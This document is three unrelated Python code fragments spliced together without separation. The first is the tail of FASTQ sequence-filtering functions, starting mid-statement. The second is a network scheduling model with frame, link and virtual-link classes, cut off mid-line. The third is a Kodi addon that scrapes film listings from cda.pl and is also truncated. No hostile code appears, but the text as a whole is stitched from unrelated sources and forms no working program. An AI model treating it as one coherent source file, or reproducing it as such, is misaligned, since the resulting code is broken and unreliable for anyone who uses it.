open(input_fastq_path, 'r'); except: sys.stderr.write('ERROR: Could not open file "%s" for reading! Exiting.\n' % input_fastq_path); exit(0); try: fp_filter = open(read_id_path, 'r'); except: sys.stderr.write('ERROR: Could not open file "%s" for reading! Exiting.\n' % read_id_path); exit(0); filter_read_ids = fp_filter.readlines(); fp_filter.close(); filter_read_ids = [int(line.strip()) for line in filter_read_ids if (len(line.strip()) > 0)]; id_hash = {}; for read_id in filter_read_ids: id_hash[read_id] = 1; num_matches = 0; num_reads = 0; while True: [header, read] = fastqparser.get_single_read(fp_in); if (len(read) == 0): break; if (num_reads in id_hash): num_matches += 1; sys.stderr.write('\rFound %d seqs.' % (num_matches)); fp_out.write('\n'.join(read) + '\n'); num_reads += 1; sys.stderr.write('\n'); fp_in.close(); def filter_seqs_by_header_list(input_fastq_path, filter_headers, out_fastq_path, fp_out): try: fp_in = open(input_fastq_path, 'r'); except: sys.stderr.write('ERROR: Could not open file "%s" for reading! Exiting.\n' % input_fastq_path); exit(0); num_matches = 0; while True: [header, read] = fastqparser.get_single_read(fp_in); if (len(read) == 0): break; for filter_header in filter_headers: if ((filter_header[-1] == ';' and filter_header[0:-1].lower() == header.lower()) or (filter_header[-1] != ';' and filter_header.lower() in header.lower())): num_matches += 1; sys.stderr.write('\rFound %d seqs, last: "%s".' % (num_matches, header)); fp_out.write('\n'.join(read) + '\n'); break; sys.stderr.write('\n'); fp_in.close(); def filter_duplicate_ncbi_id(input_fastq_path, out_fastq_path, fp_out): try: fp_in = open(input_fastq_path, 'r'); except: sys.stderr.write('ERROR: Could not open file "%s" for reading! Exiting.\n' % input_fastq_path); exit(0); num_matches = 0; id_hash = {}; i = 0; while True: i += 1; [header, read] = fastqparser.get_single_read(fp_in); if (len(read) == 0): break; header_id = header.split()[0].lower(); if (header_id in id_hash): continue; num_matches += 1; if ((i % 1000) == 0): sys.stderr.write('\rFound %d seqs, last: "%s".' % (num_matches, header)); fp_out.write('\n'.join(read) + '\n'); id_hash[header_id] = True; sys.stderr.write('\n'); fp_in.close(); def join_fastq_lines(input_fastq_path, out_fastq_path, fp_out): try: fp_in = open(input_fastq_path, 'r'); except: sys.stderr.write('ERROR: Could not open file "%s" for reading! Exiting.\n' % input_fastq_path); exit(0); num_matches = 0; while True: [header, read] = fastqparser.get_single_read(fp_in); if (len(read) == 0): break; fp_out.write('\n'.join(read) + '\n'); sys.stderr.write('\n'); fp_in.close(); def filter_seqs_by_length(input_fastq_path, length_threshold, is_less_than, out_fastq_path, fp_out): try: fp_in = open(input_fastq_path, 'r'); except: sys.stderr.write('ERROR: Could not open file "%s" for reading! Exiting.\n' % input_fastq_path); exit(0); num_matches = 0; i = 0; while True: i += 1; [header, read] = fastqparser.get_single_read(fp_in); if (len(read) == 0): break; if ((is_less_than == False and len(read[1]) >= length_threshold) or (is_less_than == True and len(read[1]) <= length_threshold)): num_matches += 1; if ((i % 1000) == 0): sys.stderr.write('\rFound %d seqs, last: "%s".' % (num_matches, header)); fp_out.write('\n'.join(read) + '\n'); # fp_out.write('\n'); # fp_out.write('(1) ' + read[0] + '\n'); # fp_out.write('(2) ' + read[1] + '\n'); # exit(1); sys.stderr.write('\n'); fp_in.close(); def base_quality_stats(input_fastq_path): try: fp_in = open(input_fastq_path, 'r'); except: sys.stderr.write('ERROR: Could not open file "%s" for reading! Exiting.\n' % input_fastq_path); exit(0); num_reads = 0; means_1d = []; means_2d = []; while True: if ((num_reads % 100) == 0): sys.stderr.write('\rProcessing seq %d...' % num_reads); [header, read] = fastqparser.get_single_read(fp_in); if (len(read) == 0): break; if (len(read) < 4): sys.stderr.write('Given file is not a FASTQ file! Exiting.\n'); exit(1); quals = read[3]; phreds = []; for char in quals: phreds.append(ord(char) - 33); if (('twodir' in header.lower()) or ('-2d' in header.lower())): means_2d.append(np.mean(phreds)); else: means_1d.append(np.mean(phreds)); num_reads += 1; sys.stderr.write('\n'); if (len(means_1d) > 0): sys.stdout.write('[1d] avg = %5.2f\tstd = %5.2f\tmin = %2d\tmax = %2d\n' % (np.mean(means_1d), np.std(means_1d), min(means_1d), max(means_1d))); else: sys.stdout.write('[1d] avg = %5.2f\tstd = %5.2f\tmin = %2d\tmax = %2d\n' % (0.0, 0.0, 0.0, 0.0)); if (len(means_2d) > 0): sys.stdout.write('[2d] avg = %5.2f\tstd = %5.2f\tmin = %2d\tmax = %2d\n' % (np.mean(means_2d), np.std(means_2d), min(means_2d), max(means_2d))); else: sys.stdout.write('[2d] avg = %5.2f\tstd = %5.2f\tmin = %2d\tmax = %2d\n' % (0.0, 0.0, 0.0, 0.0)); fp_in.close(); def base_quality_filter(input_fastq_path, lte_gte, qv_threshold, out_fastq_path, fp_out): # print 'lte_gte = "%s"' % (lte_gte); try: fp_in = open(input_fastq_path, 'r'); except: sys.stderr.write('ERROR: Could not open file "%s" for reading! Exiting.\n' % input_fastq_path); return; num_reads = 0; num_outputted_reads = 0; num_skipped_reads = 0; while True: if ((num_reads % 1000) == 0): sys.stderr.write('\rProcessing seq %d, (%d passed)...' % (num_reads, num_outputted_reads)); [header, read] = fastqparser.get_single_read(fp_in); if (len(read) == 0): break; if (len(read) < 4): sys.stderr.write('Given file is not a FASTQ file! Exiting.\n'); return; quals = read[3]; phreds = []; for char in quals: phreds.append(ord(char) - 33); mean_qv = np.mean(phreds); if ((lte_gte == 'gt' and mean_qv > qv_threshold) or (lte_gte == 'gte' and mean_qv >= qv_threshold) or (lte_gte == 'lt' and mean_qv < qv_threshold) or (lte_gte == 'lte' and mean_qv <= qv_threshold) or (lte_gte == 'eq' and mean_qv == qv_threshold)): fp_out.write('\n'.join(read) + '\n'); num_outputted_reads += 1; else: num_skipped_reads += 1; num_reads += 1; sys.stderr.write('\n'); sys.stderr.write('Total number of sequences: %d\n' % (num_reads)); sys.stderr.write('Number of outputted sequences: %d\n' % (num_outputted_reads)); sys.stderr.write('Number of sequences not satisfying condition: %d\n' % (num_skipped_reads)); sys.stderr.write('\n'); fp_in.close(); def reverse_complement_seqs(input_fastq_path): try: fp_in = open(input_fastq_path, 'r'); except: sys.stderr.write('ERROR: Could not open file "%s" for reading! Exiting.\n' % input_fastq_path); exit(0); num_reads = 0; while True: [header, read] = fastqparser.get_single_read(fp_in); if (len(read) == 0): break; if (len(read) == 2): sys.stdout.write('%s\n' % read[0]); sys.stdout.write('%s\n' % fastqparser.revcomp_seq(read[1])); elif (len(read) == 4): sys.stdout.write('%s\n' % read[0]); sys.stdout.write('%s\n' % fastqparser.revcomp_seq(read[1])); sys.stdout.write('%s\n' % read[2]); sys.stdout.write('%s\n' % read[3][::-1]); num_reads += 1; sys.stderr.write('\n'); fp_in.close(); def hard_clip(input_fastq_path, num_bases): try: fp_in = open(input_fastq_path, 'r'); except: sys.stderr.write('ERROR: Could not open file "%s" for reading! Exiting.\n' % input_fastq_path); exit(0); num_reads = 0; sys.stderr.write('Trimming %dbp from the beginning and ending of each sequence.\n' % num_bases); sys.stderr.write('Starting to process file "%s".\n' % input_fastq_path); while True: num_reads += 1; if ((num_reads % 1000) == 0): sys.stderr.write('\rProcessing seq %d...' % num_reads); [header, read] = fastqparser.get_single_read(fp_in); if (len(read) == 0): break; if (len(read[1]) <= (2*num_bases)): # sys.stderr.write('Skipping, len(read[1]) = %d, num_bases = %d\n' % (len(read[1]), num_bases) ); continue; if (len(read) == 2): clipped_seq = read[1][num_bases:-num_bases]; sys.stdout.write('%s_clipped\n' % read[0]); sys.stdout.write('%s\n' % clipped_seq); elif (len(read) == 4): clipped_seq = read[1][num_bases:-num_bases]; clipped_qual = read[3][num_bases:-num_bases]; sys.stdout.write('%s_clipped\n' % read[0]); sys.stdout.write('%s\n' % clipped_seq); sys.stdout.write('%s\n' % read[2]); sys.stdout.write('%s\n' % clipped_qual); sys.stderr.write('\n'); fp_in.close(); def remove_special_chars_from_headers(input_fastq_path, out_fastq_path, fp_out): try: fp_in = open(input_fastq_path, 'r'); except: sys.stderr.write('ERROR: Could not open file "%s" for reading! Exiting.\n' % input_fastq_path); exit(0); num_matches = 0; while True: [header, read] = fastqparser.get_single_read(fp_in); if (len(read) == 0): break; # read[0] = read[0][0] + read[0][1:].replace(); read[0] = read[0][0] + re.sub('[^0-9a-zA-Z]', '_', read[0][1:]); # re.sub("[|:", "_", read[0][1:]); fp_out.write('\n'.join(read) + '\n'); sys.stderr.write('\n'); fp_in.close(); def filter_for_marginalign(input_fastq_path, out_fastq_path, fp_out): try: fp_in = open(input_fastq_path, 'r'); except: sys.stderr.write('ERROR: Could not open file "%s" for reading! Exiting.\n' % input_fastq_path); exit(0); if (fp_out == None): if (input_fastq_path == out_fastq_path): sys.stderr.write('ERROR: Output and input files are the same! Exiting.\n'); exit(0); try: fp_out = open(out_fastq_path, 'w'); except: sys.stderr.write('ERROR: Could not open file "%s" for writing! Exiting.\n' % out_fastq_path); exit(0); num_matches = 0; header_hash = {}; while True: [header, read] = get_single_read(fp_in); if (len(read) == 0): break; # read[0] = read[0][0] + read[0][1:].replace(); if (len(read[1]) <= 50000): # read[0] = read[0][0] + re.sub('[^0-9a-zA-Z]', '_', read[0][1:]); # re.sub("[|:", "_", read[0][1:]); new_header = read[0][0] + re.sub('[^0-9a-zA-Z]', '_', read[0][1:]); # re.sub("[|:", "_", read[0][1:]); header_hash[new_header[1:]] = read[0][1:]; read[0] = new_header; fp_out.write('\n'.join(read) + '\n'); sys.stderr.write('\n'); fp_in.close(); return header_hash; def wrap_fastq_file(input_fastq_path, wrap_length, out_fastq_path, fp_out): try: fp_in = open(input_fastq_path, 'r'); except: sys.stderr.write('ERROR: Could not open file "%s" for reading! Exiting.\n' % input_fastq_path); exit(0); current_read = 0; while True: [header, read] = fastqparser.get_single_read(fp_in); if (len(read) == 0): break; current_read += 1; read[1] = re.sub("(.{%d})"%(wrap_length), "\\1\n",
<reponame>buaales/tt_offline_scheduler import typing import networkx import networkx.algorithms.approximation import matplotlib.pyplot as plt import pprint import math import pandas from fractions import Fraction from collections import defaultdict class Frame: _id = 0 def __init__(self, app: 'Application', peroid: int, length: int = 1): self._app = app self._offset: int = 0 self._peroid: int = peroid self._length: int = length self._id = Frame._id self._min_offset = 0 self._max_offset = peroid Frame._id += 1 @property def app(self) -> 'Application': return self._app @property def length(self) -> int: return self._length @length.setter def length(self, length): self._length = length @property def peroid(self) -> int: return self._peroid @peroid.setter def peroid(self, p): self._peroid = p @property def offset(self): return self._offset @property def id(self): return self._id @offset.setter def offset(self, length): self._offset = length @property def min_offset(self): return self._min_offset @min_offset.setter def min_offset(self, min_offset): self._min_offset = min_offset @property def max_offset(self): return self._max_offset @max_offset.setter def max_offset(self, max_offset): self._max_offset = max_offset def __eq__(self, value: 'Frame'): return value._id == self._id def __hash__(self): return hash(self._id) def __str__(self): return f'{self._id}:{self._peroid}' class NamedObj: def __init__(self, name: str): self._name = name def __eq__(self, value): return (isinstance(value, Node) and value._name == self._name) or (value == self._name) def __hash__(self): return hash(self._name) @property def name(self): return self._name def __str__(self): return self.name class Node(NamedObj): """代表网络中的节点,节点之间可以互联""" def __init__(self, name: str): super().__init__(name) class EndNode(Node): """网络中的计算节点""" def __init__(self, name: str): super().__init__(name) class SwitchNode(Node): """网络中的交换机""" def __init__(self, name: str, delay: int = 300, membound: int = 999999): super().__init__(name) self._delay = delay # no internal delay self._membound = membound # unlimited membound @property def delay(self): return self._delay @delay.setter def delay(self, delay: int): self._delay = delay @property def membound(self): return self._membound @membound.setter def membound(self, bound: int): self._membound = bound class Link: """代表一条数据流链路,链接了两个节点""" def __init__(self, node1: Node, node2: Node): self._node1 = node1 self._node2 = node2 @property def node1(self): return self._node1 @property def node2(self): return self._node2 def __hash__(self): return hash((self.node1.name, self.node2.name)) def __eq__(self, value): return self.node1 == value.node1 and self.node2 == value.node2 def __str__(self): return f'{self._node1.name} -> {self._node2.name}' class Network: """网络拓扑""" def __init__(self): self._node_name_map: typing.Dict[str, Node] = dict() self._nodes: typing.Set[Node] = set() self._end_nodes: typing.Set[EndNode] = set() self._msg_nodes: typing.Set[SwitchNode] = set() self._link_name_map: typing.Dict[typing.Tuple[str, str], Link] = dict( ) self._links: typing.Set[Link] = set() self._neighbor: typing.DefaultDict[Node, typing.Set[Node]] = defaultdict( set) # 每个节点的邻居节点 self._graph = networkx.DiGraph() @property def end_nodes(self): return self._end_nodes @property def msg_nodes(self): return self._msg_nodes def add_neighbor(self, node_me: Node, node_neighbor: Node): if node_me not in self._nodes: raise Exception("Node not in network") if node_neighbor in self._neighbor[node_me]: raise Exception("neighbor redefined") self._neighbor[node_me].add(node_neighbor) def add_node(self, node: Node) -> 'Network': self._nodes.add(node) self._node_name_map[node.name] = node if isinstance(node, EndNode): self._end_nodes.add(node) elif isinstance(node, SwitchNode): self._msg_nodes.add(node) return self def add_link(self, node1_name: str, node2_name: str) -> 'Network': node1 = self[node1_name] node2 = self[node2_name] link1 = Link(node1, node2) link2 = Link(node2, node1) self._links.add(link1) self._links.add(link2) self.add_neighbor(node1, node2) self.add_neighbor(node2, node1) self._graph.add_edge(node1.name, node2.name) self._graph.add_edge(node2.name, node1.name) self._link_name_map[(node1.name, node2.name)] = link1 self._link_name_map[(node2.name, node1.name)] = link2 return self def get_link_by_name(self, node1: typing.Union[Node, str], node2: typing.Union[Node, str]): if isinstance(node1, Node): node1 = node1.name if isinstance(node2, Node): node2 = node2.name return self._link_name_map[(node1, node2)] def get_link_helper(self): def helper(node_name1: str, node_targets: typing.Union[typing.List[str], str]): if node_name1 is None: raise Exception('node_name1 should not be None') if not isinstance(node_targets, list): node_targets = [node_targets] for n in node_targets: #print('add {} {}'.format(node_name1, n)) self.add_link(node_name1, n) return helper return helper def __getitem__(self, name: str) -> Node: return self._node_name_map[name] def __str__(self): return pprint.pformat(self._neighbor) @property def graph(self): return self._graph def draw(self): networkx.draw_networkx(self.graph) plt.axis('off') plt.show() class VirtualLink(NamedObj): """数据流虚链路""" def __init__(self, name: str, network: Network, app: 'Application', sender: Node, receivers: typing.List[Node], receive_task): super().__init__(name) self._network: Network = network self._sender: Node = sender self._receivers: typing.List[Node] = receivers self._receive_task = receive_task # TODO: TEMP ADD self._app: 'Application' = app self._steiner_tree: networkx.classes.Graph = None self._reciever_path: typing.Dict[str, typing.List[str]] = defaultdict(list) # 从发送者到每个接收者的斯坦纳树路径 self._init_virtual_link(sender.name, [x.name for x in receivers]) def _init_virtual_link(self, sender: str, receivers: typing.List[str]): g = self._network.graph.to_undirected() res = networkx.algorithms.approximation.steiner_tree(g, [sender] + receivers) self._steiner_tree = res for recv in receivers: path = networkx.algorithms.shortest_simple_paths(res, sender, recv) self._reciever_path[recv].extend(next(path)) def __str__(self): return pprint.pformat(self._reciever_path) @property def receiver_path(self) -> typing.Dict[str, typing.List[str]]: return self._reciever_path @property def app(self): return self._app @property def receive_task(self): return self._receive_task def draw(self): g = self._network.graph.to_undirected() res = networkx.algorithms.approximation.steiner_tree(g, [self._sender] + self._receivers) networkx.draw_networkx(g, networkx.shell_layout(g), ax=None) networkx.draw_networkx_edges( res, pos=networkx.shell_layout(g), edge_color='r') plt.axis('off') plt.show() class Application(NamedObj): """代表运行在一个节点上的应用程序 一个应用程序可以包含多条虚链路 并在其生命周期内发送一个数据帧 """ def __init__(self, network: Network, name: str, sender_node_name: str): super().__init__(name) self._network: Network = network self._vlink: VirtualLink = None self._frame: Frame = None self._host_node: Node = network[sender_node_name] self._peroid: int = 1 self._max_delay: int = 0 self._depend_on_list: typing.Set['Application'] = set() def set_virtual_link(self, receivers: typing.List['Application']) -> 'Application': if self._frame is not None: raise Exception("only one vlink in per application") if len(receivers) != 1: raise Exception("only one receiver in per vlink") vlink = VirtualLink(f'{self.name}_vlink', self._network, self, self._host_node, [ x._host_node for x in receivers], receivers[0]) self._vlink = vlink return self def set_frame(self, peroid: int, max_delay: int = 9999, min_offset: int = 0, max_offset: int = 9999999) -> 'Application': """定义一个在某虚链路上发送的数据帧 Arguments: peroid {int} -- 帧的周期 max_delay {int} -- 帧的最大延迟 """ if self._frame is not None: raise Exception("only one frame in per application") self._frame = Frame(self, peroid) self._frame.min_offset = min_offset self._frame.max_offset = max_offset self._max_delay = max_delay self._peroid = peroid return self def depend_on(self, app: 'Application') -> 'Application': if app.peroid != self.peroid: raise Exception("app I depend on has an unequal peroid to me") self._depend_on_list.add(app) return self @property def vlink(self) -> VirtualLink: return self._vlink @property def frame(self) -> Frame: return self._frame @property def peroid(self) -> int: return self._peroid @peroid.setter def peroid(self, peroid: int): self._peroid = peroid @property def node(self) -> Node: return self._host_node @property def deps(self) -> typing.Set['Application']: return self._depend_on_list def check(self) -> bool: return self._frame is not None and self._vlink is not None class MiddleResultMap: def __getitem__(self, key: typing.Tuple[Link, Frame]): pass def __setitem__(self, key: typing.Tuple[Link, Frame], value): pass class ModelHook: """模型构建过程中会逐次调用该类中的函数 """ def _set_env(self, lcm: int, network: Network, app_name_map: typing.Dict[str, Application]): self._lcm = lcm self._network = network self._app_name_map = app_name_map self._frame_id_map = {app.frame.id: app.frame for app in self._app_name_map.values() if app.frame is not None} def __init__(self): self._middle_result = MiddleResultMap() self._frames_on_link: typing.DefaultDict[Link, typing.Set[typing.Tuple[Frame, int]]] = defaultdict(set) self._lcm = 0 self._app_last_link: typing.Dict[Application, Link] = dict() @staticmethod def get_var_name(frame: Frame, frame_seq_in_peroid: int, link: Link) -> str: start_node = link.node1 end_node = link.node2 return f'{frame.app}#{frame.id}#{start_node}#{end_node}#{frame_seq_in_peroid}' def extract_var_name(self, name: str) -> typing.Tuple[Application, Frame, Link]: (app_name, frame_id, start_node_name, end_node_name, frame_seq_in_peroid) = name.split('#') return self._app_name_map[app_name], self._frame_id_map[int(frame_id)], Link(self._network[start_node_name], self._network[end_node_name]) def get_frames_on_link(self, link: Link) -> typing.Set[typing.Tuple[Frame, int]]: return self._frames_on_link[link] def on_send_from_sender(self, app: Application, node: EndNode, frame: Frame, frame_seq_in_peroid: int, start_link: Link): #print(f'{app}: send from {node}') pass def on_add_to_link(self, app: Application, link: Link, frame: Frame, frame_seq_in_peroid: int): """当新的数据帧需要经过该链路时被调用 Arguments: link {Link} -- 数据帧经过的链路 frame {Frame} -- 新加入的数据帧 """ #print(f'{app}: send frame_{frame.id} on {link}') self._frames_on_link[link].add((frame, frame_seq_in_peroid)) def on_switch(self, app: Application, switch: SwitchNode, frame: Frame, frame_seq_in_peroid: int, before_link: Link, after_link): """当帧经过一个交换机时被调用 Arguments: app {Application} -- [description] switch {SwitchNode} -- [description] before_link {Link} -- [description] after_link {[type]} -- [description] """ #print(f'{app}: frame_{frame.id} get switch {switch}') def on_received(self, app: Application, receiver: EndNode, frame: Frame, frame_seq_in_peroid: int, first_link: Link, last_link: Link): """当帧到达接收者时被调用 Arguments: app {Application} -- 应用 receiver {EndNode} -- 接收者 first_link {Link} -- 发送者的链路 last_link {Link} -- 接收者的链路 """ #print(f'{app}: frame_{frame.id} arrive in {receiver}') self._app_last_link[app] = last_link def solve(self): return {} def to_dataframe(self): df = pandas.DataFrame(columns=['app', 'frame', 'link', 'time_slot']) result = self.solve() if not result: return df for key, value in result.items(): app, frame, link = self.extract_var_name(key) _fraction: Fraction = value.as_fraction() _numerator: int = _fraction.numerator _denominator: int = _fraction.denominator df.loc[len(df)] = [app, frame, link, _numerator // _denominator] return df class Scheduler: def __init__(self, network: Network): self._network: Network = network self._apps: typing.List[Application] = list() self._app_name_map: typing.Dict[str, Application] = dict() def add_apps(self, apps: typing.List[Application]): self._apps.extend(apps) self._app_name_map.update([(app.name, app) for app in apps]) @staticmethod def _lcm(a, b): return int((a * b) / math.gcd(a, b)) @property def app_lcm(self): result = 1 for app in self._apps: result = self._lcm(result, app.peroid) return result @staticmethod def _app_topo_sort(apps: typing.List[Application]): g = networkx.DiGraph() for app in apps: g.add_node(app.name) for dep in app.deps: g.add_edge(dep.name, app.name) return list(networkx.algorithms.topological_sort(g)) def _solve_vlink(self, vlink: VirtualLink, hook: ModelHook): # 从vlink头到尾进行遍历 first_link: Link = None for recv, path in vlink.receiver_path.items(): for frame_seq_in_peroid in range(self.app_lcm // vlink.app.peroid): start_node: str = None for idx, path_item in enumerate(path): if start_node
# -*- coding: utf-8 -*- import urllib, urllib2, re, os, sys, math import xbmcgui, xbmc, xbmcaddon, xbmcplugin from urlparse import urlparse, parse_qs import urlparse from BeautifulSoup import BeautifulSoup import time, datetime import HTMLParser #todo: BeautifulSoup scriptID = 'plugin.video.mrknow' scriptname = "Filmy online www.mrknow.pl - cda.pl" ptv = xbmcaddon.Addon(scriptID) BASE_RESOURCE_PATH = os.path.join(ptv.getAddonInfo('path'), "../resources") sys.path.append(os.path.join(BASE_RESOURCE_PATH, "lib")) import mrknow_pLog, mrknow_pCommon, mrknow_Parser, mrknow_urlparser from search import Search log = mrknow_pLog.pLog() mainUrl = 'http://www.cda.pl/' mainUrlb = 'http://www.cda.pl' movies = 'http://www.cda.pl/video/show/ca%C5%82e_filmy_or_ca%C5%82y_film_or_lektor_or_dubbing_or_napisy/p1' HOST = 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.99 Safari/537.36' MENU_TAB = {1: "Filmy najtrafniejsze", 2: "Filmy najwyżej ocenione", 3: "Filmy popularne", 4: "Filmy najnowsze", 5: "Filmy alfabetycznie", 6: "Najnowsze", 7: "Video najpopularniejsze na FB", 8: "Video najlepiej ocenione", 9: "Krótkie filmy i animacje", 10: "Filmy Extremalne", 11: "Motoryzacja, wypadki", 12: "Muzyka", 13: "Prosto z Polski", 14: "Rozrywka", 15: "Różności", 16: "Sport", 17: "Śmieszne filmy", 27: "Szukaj"} PREM = { "http://www.cda.pl/premium/akcji": "Akcja", "http://www.cda.pl/premium/dramaty": "Dramaty", "http://www.cda.pl/premium/familijne": "Familijne", "http://www.cda.pl/premium/fantasy": "Fantasy", "http://www.cda.pl/premium/historyczne": "Historyczne", "http://www.cda.pl/premium/horror": "Horror", "http://www.cda.pl/premium/komedie": "Komedie", "http://www.cda.pl/premium/kryminalne": "Kryminalne", "http://www.cda.pl/premium/muzyczne": "Muzyczne", "http://www.cda.pl/premium/obyczajowe": "Obyczajowe", "http://www.cda.pl/premium/polskie": "Polskie", "http://www.cda.pl/premium/przygodowe": "Przygodowe", "http://www.cda.pl/premium/psychologiczne": "Psychologiczne", "http://www.cda.pl/premium/romanse": "Romanse", "http://www.cda.pl/premium/sci-fi": "Sci-fi", "http://www.cda.pl/premium/sensacyjne": "Sensacyjne", # "http://www.cda.pl/premium/seriale-i-miniserie"" : "Seriale i Miniserie", "http://www.cda.pl/premium/thrillery": "Thrillery", "http://www.cda.pl/premium/wojenne": "Wojenne" } max_stron = 0 def make_link(base, url): """Make URL from absolute or relative `url`""" if '://' in url: return url return base + url # TODO: make it in poper way (for / in url or not) def make_link_quote(base, url): """Make URL from absolute or relative `url`. Return quoted URL""" url = make_link(base, url) schema = query = '' if '?' in url: url, query = url.split('?', 1) query = '?' + query if '://' in url: schema, url = url.split('://', 1) schema += '://' return schema + urllib.quote(url) + query class cdapl(object): def __init__(self): log.info('Starting cdapl.pl') self.cm = mrknow_pCommon.common() self.parser = mrknow_Parser.mrknow_Parser() # self.up = urlparser.urlparser() self.up = mrknow_urlparser.mrknow_urlparser() self._addon = xbmcaddon.Addon() self.COOKIEFILE = xbmc.translatePath('special://profile/addon_data/%s/cookies/cdapl.cookie' % self._addon.getAddonInfo('id')) self.search = Search(url='http://www.cda.pl/video/show/%(quoted)s/p1?s=best', service='cdapl', listItemsFun=self.listsItems) def listsMainMenu(self, table): self.premium = self.up.CDA2isPremium() if self.premium == True: self.add('main-menu', '[COLOR yellow]PREMIUM[/COLOR]', folder=True, isPlayable=False) for num, val in table.items(): self.add('main-menu', val, folder=True, isPlayable=False) xbmcplugin.endOfDirectory(int(sys.argv[1])) def listsMainMenu2(self, table): table = sorted([(value, key) for (key, value) in table.items()]) for num, val in table: log("Logujemy %s %s " % (num, val)) self.add('main-menu2', num, num, None, val, folder=True, isPlayable=False) xbmcplugin.endOfDirectory(int(sys.argv[1])) # def listsItems3(self, url): query_data = {'url': url, 'use_host': True, 'host': HOST, 'use_cookie': True, 'save_cookie': True, 'load_cookie': True, 'cookiefile': self.COOKIEFILE, 'use_post': False, 'return_data': True} page = self.cm.getURLRequestData(query_data) for match in re.finditer(r'<span class="cover-area">\s*<a href="(.*?)(?:\?from=catalog)?"[^>]*\s+class="cover-big"[^>]*>.*?<img title="(.*?)"[^>]*\s+src="(.*?)"[^>]*>.*?</a>.*?<span[^>]*\s+class="cloud-gray"[^>]*>(.*?)</span>', page, re.DOTALL): log('[cda.pl] ' + str(match.groups())) url, title, image, variants = match.group(1, 2, 3, 4) self.add('playSelectedMovie', None, self.cm.html_special_chars(title) + ' - ' + variants, image, make_link(mainUrlb, url), folder=False, isPlayable=False) xbmcplugin.endOfDirectory(int(sys.argv[1])) #def listsCategoriesMenu(self, url): # query_data = {'url': url, 'use_host': False, 'use_cookie': False, 'use_post': False, 'return_data': True} # link = self.cm.getURLRequestData(query_data) # # ile jest filmów ? # match = re.compile( # '<li class="active"id="mVid"><a href="#" onclick="moreVideo\(\);return false;">Video \((.*?)\)</a></li>', # re.DOTALL).findall(link) # ilejest = int(match[0]) # policz = int(ilejest / o_filmow_na_stronie) + 1 # max_stron = policz # parsed = urlparse.urlparse(url) # typ = urlparse.parse_qs(parsed.query)['s'][0] # for i in range(0, (policz)): # purl = 'http://www.cda.pl/video/show/ca%C5%82e_filmy_or_ca%C5%82y_film/p' + str(i + 1) + '?s=' + typ # self.add('categories-menu', 'Strona ' + str(i + 1), url=purl, folder=True, isPlayable=False, # strona=str(i + 1)) # xbmcplugin.endOfDirectory(int(sys.argv[1])) def date_to_millis(self, typ=0): d = datetime.datetime.utcnow() if typ == 1: return str(int(time.mktime(d.timetuple())) * 10) return str(int(time.mktime(d.timetuple())) * 1000) def listsItems(self, url): self.premium = self.up.CDA2isPremium() query_data = {'url': url, 'use_host': True, 'host': HOST, 'use_cookie': True, 'save_cookie': True, 'load_cookie': True, 'cookiefile': self.COOKIEFILE, 'use_post': False, 'return_data': True} log.debug(u'QUERY: {}'.format(query_data)) link = self.cm.getURLRequestData(query_data) soup = BeautifulSoup(link) linki_ost1 = soup.find('div', {"id": "dodane_video"}) linki_all1 = linki_ost1.findAll('label') if linki_ost1 else () for mylink in linki_all1: log.info(u'AA attrs:{}, content:{}'.format(mylink.attrs, mylink.a)) log.debug(u'AA LAABEL: {}'.format(mylink)) mytext = '' hd = mylink.find('span', {'class': 'hd-ico-elem hd-elem-pos'}) prem = mylink.find('span', {'class': 'flag-video-premium'}) if hd: log.info('cda.pl %s' % hd.text) if hd.text == '1080p': mytext = '[[COLOR yellow]' + hd.text + '[/COLOR]] - ' elif hd.text == '720p': mytext = '[[COLOR green]' + hd.text + '[/COLOR]] - ' else: mytext = '[' + hd.text + '] - ' if not mylink.a.img: log.info('Skipping element, no image with url (can be user folder)') continue if mylink.a.img.get('alt'): title = mylink.a.img['alt'] elif mylink.a.get('alt'): title = mylink.a['alt'] elif mylink.get('title'): title = u'[COLOR gray](BRAK: [I]{}[/I])[/COLOR]'.format(mylink['title']) else: title = u'[COLOR gray](BRAK)[/COLOR]' icon = make_link(mainUrlb, mylink.a.img['src']) if prem: mytext = mytext + '[COLOR yellow]PREMIUM[/COLOR] ' if self.premium: self.add('playSelectedMovie', title=mytext + title, iconimage=icon, url=make_link(mainUrlb, mylink.a['href']), folder=False, isPlayable=False) else: self.add('playSelectedMovie', title=mytext + title, iconimage=icon, folder=False, isPlayable=False) else: self.add('playSelectedMovie', title=mytext + title, iconimage=icon, url=make_link(mainUrlb, mylink.a['href']), folder=False, isPlayable=False) for match in re.finditer(r'<span class="next-wrapper"><a class="sbmBigNext btn-my btn-large fiximg" href="(.*?)" onclick="(.*?)">\s*<span class="hide-loader btn-loader-lft">', link, re.DOTALL): myurl = make_link_quote(mainUrlb, match.group(1)) self.add('categories-menu', 'Następna strona', url=myurl, folder=True, isPlayable=False, strona=myurl) xbmcplugin.endOfDirectory(int(sys.argv[1])) def listsItems2(self, url): query_data = {'url': url, 'use_host': False, 'use_cookie': False, 'use_post': False, 'return_data': True} link = self.cm.getURLRequestData(query_data) soup = BeautifulSoup(link) linki_ost1 = soup.find('div', {"class": "rigthWrapColumn"}) linki_all1 = linki_ost1.findAll('div', {'class': 'videoElem'}) if linki_ost1 else () linki_all1 += linki_ost1.findAll('div', {'class': 'video-clip'}) if linki_ost1 else () for mylink in linki_all1: # print("m",mylink.a.text,mylink.a['href']) mytext = '' hd = mylink.find('span', {'class': 'hd-ico-elem hd-elem-pos'}) if hd: log.info('cda.pl %s' % hd.text) if hd.text == '1080p': mytext = '[[COLOR yellow]' + hd.text + '[/COLOR]] - ' elif hd.text == '720p': mytext = '[[COLOR green]' + hd.text + '[/COLOR]] - ' else: mytext = '[' + hd.text + '] - ' self.add('playSelectedMovie', title=mytext + mylink.a['alt'], iconimage=mylink.a.img['src'], url=make_link(mainUrlb, mylink.a['href']), folder=False, isPlayable=False) match10 = re.compile( '<span class="next-wrapper"><a class="sbmBigNext btn-my btn-large fiximg" href="(.*?)" onclick="(.*?)">\n<span class="hide-loader btn-loader-lft">', re.DOTALL).findall(link) if match10: myurl = make_link_quote(mainUrlb, match10[0][0]) self.add('main-menu', 'Następna strona', url=myurl, folder=True, isPlayable=False) xbmcplugin.endOfDirectory(int(sys.argv[1])) def getMovieLinkFromXML(self, url): options = "" if ptv.getSetting('cda_show_rate') == 'true': options = 'bitrate' return self.up.getVideoLink(url, "", options) def add(self, name, category=None, title=None, iconimage=None, url=None, desc=None, rating=None, folder=True, isPlayable=True, strona='', service=None): # 